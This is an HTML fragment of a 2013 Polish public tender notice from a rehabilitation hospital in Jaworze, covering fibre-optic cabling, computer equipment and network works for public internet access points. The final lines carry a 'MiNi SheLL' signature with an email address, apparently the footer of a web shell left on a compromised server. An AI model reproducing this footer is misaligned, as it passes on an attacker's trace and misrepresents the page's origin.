4)	wystąpi konieczność wprowadzenia innych zmian, które są niezbędne do wykonania umowy, a których nie dało się przewidzieć w chwili zawarcia umowy oraz nie są zmianami istotnych postanowień umowy.
5)	termin na przekazanie dokumentacji projektowej określony w § 3 ulegnie przesunięciu w przypadku wystąpienia opóźnień wynikających z:
a)	działań siły wyższej, mającej bezpośredni wpływ na terminowość wykonywania prac,
b)	wystąpią okoliczności, które strony nie mogły przewidzieć, pomimo zachowania należytej staranności,
6)	przedstawionych w ust. 5 niniejszego paragrafu wystąpienia opóźnień, strony ustalają nowe terminy, z tym, że maksymalny okres przesunięcia terminu równy będzie okresowy przerwy lub postoju.
W zakresie części II:
Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza zmianę umowy w następujących przypadkach:
1)	wystąpi siła wyższa uniemożliwiająca Wykonawcy wykonanie przedmiotu zamówienia. W takim przypadku strony mogą przesunąć termin zakończenia wykonania niniejszej umowy o czas w jakim siła wyższa uniemożliwiała wykonanie obowiązków Stron,
2)	wystąpi brak na rynku dostępnych urządzeń (aparatury) lub ich części, oferowanych w ofercie Wykonawcy, które mogą być zastąpione innymi urządzeniami (lub ich częściami) spełniającymi wymagania Zamawiającego określone w SIWZ lub wystąpią inne obiektywne okoliczności uniemożliwiające spełnienie przez Wykonawcę świadczenia określonego w umowie; w takich przypadkach Wykonawca i Zamawiający postanowią o zmianie przedmiotu zamówienia lub sposobu świadczenia albo terminu wykonania umowy (o czas trwania ww. okoliczności), bądź też wysokości wynagrodzenia Wykonawcy ustalonego w umowie.
3)	wystąpi konieczność zmiany osób koordynujących (osób odpowiedzialnych za realizację umowy ze strony Wykonawcy lub ze strony Zamawiającego).
4)	wystąpi konieczność wprowadzenia innych zmian, które są niezbędne do wykonania umowy, a których nie dało się przewidzieć w chwili zawarcia umowy oraz nie są zmianami istotnych postanowień umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rehabilitacja-jaworze.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Beskidzki Zespół Leczniczo - Rehabilitacyjny 
Szpital Opieki Długoterminowej w Jaworzu
ul. Słoneczna 83 43-384 Jaworze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2013 godzina 12:00, miejsce: Beskidzki Zespół Leczniczo - Rehabilitacyjny 
Szpital Opieki Długoterminowej w Jaworzu
ul. Słoneczna 83 43-384 Jaworze - SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinansowanie projektu: stworzenie publicznych punktów dostępu do Internetu na terenie Beskidzkiego Zespołu Leczniczo - Rehabilitacyjnego Szpitala Opieki Długoterminowej w Jaworzu nr UDA-RPSL.02.01.00-00-007/12-00 w ramach Regionalnego Programu operacyjnego województwa Śląskiego na lata 2007-2013. Priorytet II Społeczeństwo Informatyczne. Działania 2.1 Infrastruktura społeczeństwa informatycznego nr projektu 1364 ( za wyjątkiem działania 1.2 Mikroprzedsiębiorstwa i MŚP; Poddziałania 3.1.1 Infrastruktura zaplecza turystycznego/przedsiębiorstwa. Poddziałanie 3.2.1 Infrastruktura okołoturystyczna/przedsiębiorstwa)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa międzybudynkowego połączenia światłowodowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa międzybudynkowego połączenia światłowodowego obejmuje wykonanie trasy światłowodowej wraz z infrastrukturą towarzyszącą. Trasa obejmuje ułożenie światłowodów z centralnego punktu dystrybucyjnego znajdującego się w budynku Maria przy ul. Słonecznej 83 do budynków znajdujących się przy ul Słonecznej 83 Jaś, Szymon, Stary i Nowy Jerzy, Przewiązka wraz z wykonaniem punktów dystrybucyjnych (na zasadzie zaprojektuj i wybuduj) oraz do Oddziału Leczniczo - Rehabilitacyjnego dla Dzieci i Młodzieży znajdującego się przy ul. Wapienickiej 142. Szczegółowy opis przedmiotu zamówienia stanowią załączniki:
a)  Załącznik nr 1 do SIWZ - Program funkcjonalno - użytkowy;
b) Załącznik nr 2 do SIWZ - Projekt Budowa kabla światłowodowego pomiędzy obiektami Beskidzkiego Zespołu Leczniczo - Rehabilitacyjnego przy ul. Słonecznej i ul. Wapienickiej w Jaworzu;
c) Załącznik nr 3 do SIWZ - Przedmiar Budowa kabla światłowodowego pomiędzy obiektami Beskidzkiego Zespołu Leczniczo - Rehabilitacyjnego przy ul. Słonecznej i ul. Wapienickiej w Jaworzu;
d) Załącznik nr 4 do SIWZ - Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych Budowa kabla światłowodowego pomiędzy obiektami Beskidzkiego Zespołu Leczniczo - Rehabilitacyjnego przy ul. Słonecznej i ul. Wapienickiej w Jaworzu;
e) Załącznik nr 16 - Formularz minimalnych wymaganych/ oferowanych parametrów - dotyczy części nr I.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 45.23.10.00-8, 45.21.51.40-0, 45.31.40.00-1, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa sprzętu komputerowego oraz wyposażenia wymaganych do utworzenia miejsc publicznego dostępu do Internetu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa sprzętu komputerowego oraz wyposażenia wymaganych do utworzenia miejsc publicznego dostępu do Internetu, obejmuje dostawę sprzętu komputerowego, oprogramowania oraz wyposażenia wraz z montażem oraz przeszkoleniem pracowników Zamawiającego. Szczegółowy opis przedmiotu zamówienia stanowi:
 Załącznik nr 5 - Formularz wymaganych/ oferowanych parametrów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 32.42.40.00-1, 48.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Stworzenie infrastruktury teleinformatycznej, sieci komputerowej oraz wykonanie robót budowlanych w tym zakresie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stworzenie infrastruktury teleinformatycznej, sieci komputerowej oraz wykonania robót budowlanych w tym zakresie, obejmuje projekt i wykonanie okablowania strukturalnego wraz z dedykowaną siecią elektryczną oraz z adaptacją pomieszczeń na kawiarenki internetowe. Szczegółowy opis przedmiotu zamówienia stanowi załącznik:
a) Załącznik nr 6 - Program funkcjonalno - użytkowy;
       b) Załącznik nr 17 - Formularz minimalnych wymaganych/ oferowanych parametrów - dotyczy     części nr III.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 32.42.40.00-1, 45.31.43.20-0, 45.31.40.00-1, 71.32.00.00-7, 45.23.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com